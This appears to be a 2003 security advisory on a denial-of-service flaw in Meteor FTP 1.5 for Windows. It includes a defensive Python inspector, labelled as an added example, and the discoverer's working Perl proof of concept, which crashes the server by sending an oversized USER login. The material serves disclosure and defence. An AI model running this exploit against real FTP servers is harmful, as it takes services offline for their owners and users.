Denial of Service in Meteor FTP Server for Windows
A Denial of Service (DoS) condition exists in Meteor FTP 1.5 for Windows.
August 11, 2003
Reported August 09, 2003, by Zee.
VERSIONS AFFECTED
Meteor FTP 1.5 for Windows
DESCRIPTION
A Denial of Service (DoS) condition exists in Meteor FTP 1.5 for Windows. By connecting to the Meteor FTP server and issuing the USER command followed by large amounts of data, the FTP server will stop responding.
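A defensive counterpart to the condition described above, added here as an example and not part of the original advisory or of Meteor FTP: a Python inspector for the FTP control channel, of the kind a filtering proxy or log monitor could apply, that flags an oversized USER argument before it reaches the server. The class name and both length limits are assumptions; the advisory does not state the size at which the server stops responding.

```python
import re

# Assumed policy limits (not from the advisory, which gives no exact size).
MAX_USER_ARG = 64      # longest username argument accepted
MAX_LINE = 512         # longest control-channel line accepted

USER_RE = re.compile(rb"^USER(?: (.*))?$", re.IGNORECASE)


class FtpControlInspector:
    """Reassembles one client's FTP control lines and flags oversized USER commands."""

    def __init__(self):
        self.buf = b""

    def feed(self, chunk):
        """Take raw bytes from the client; return a list of (verdict, detail) tuples."""
        findings = []
        self.buf += chunk
        while b"\n" in self.buf:
            line, self.buf = self.buf.split(b"\n", 1)
            findings.append(self._check(line.rstrip(b"\r")))
        # A sender can also withhold the line ending; cap the pending data.
        if len(self.buf) > MAX_LINE:
            findings.append(("block", f"unterminated line over {MAX_LINE} bytes"))
            self.buf = b""
        return findings

    def _check(self, line):
        if len(line) > MAX_LINE:
            return ("block", f"line of {len(line)} bytes")
        m = USER_RE.match(line)
        if m and len(m.group(1) or b"") > MAX_USER_ARG:
            return ("block", f"USER argument of {len(m.group(1))} bytes")
        return ("pass", line.decode("ascii", "replace"))


# Constructed sample traffic, split mid-command as TCP may deliver it.
SAMPLE_CHUNKS = [b"USER anon", b"ymous\r\nPASS guest\r\n", b"user " + b"%" * 300, b"\r\n"]

def inspect_sample():
    inspector = FtpControlInspector()
    return [f for chunk in SAMPLE_CHUNKS for f in inspector.feed(chunk)]

if __name__ == "__main__":
    for verdict, detail in inspect_sample():
        print(verdict, detail)
```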
DEMONSTRATION
The discoverer posted the following code as proof of concept:
#!/usr/bin/perl
#
# meteordos.pl - Remote DoS against Meteor FTP Version 1.5
#
# A vulnerability in Meteor FTP 1.5 allows malicious users
# to remotely crash the ftpd. By connecting to the ftpd and
# issuing USER, followed by large amounts of data, the server
# crashes. For more information, go to :
# http://www.evicted.org/projects/writings/mftpadvisory.txt
#
# Usage : ./meteordos.pl
#
# Vulnerability & code by zerash
# Contact : [email protected]
use Net::FTP;
$host = $ARGV[0];
if ("$ARGV[0]" eq "") {
print("DoS against Meteor FTP Version 1.5 by [email protected]");
die("Usage: ./meteorftpdos ");
} else {
print("Connecting to $host...");
my $ftp = Net::FTP->new($host) or die "Couldn't connect to $host";
print("Connected!");
print("Attempting to exploit the ftpd...");
$ftp->login('%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%');
$ftp->quit;
print("Success!");
}
VENDOR RESPONSE
MeteorSoft has been notified.
CREDIT
Discovered by Zee.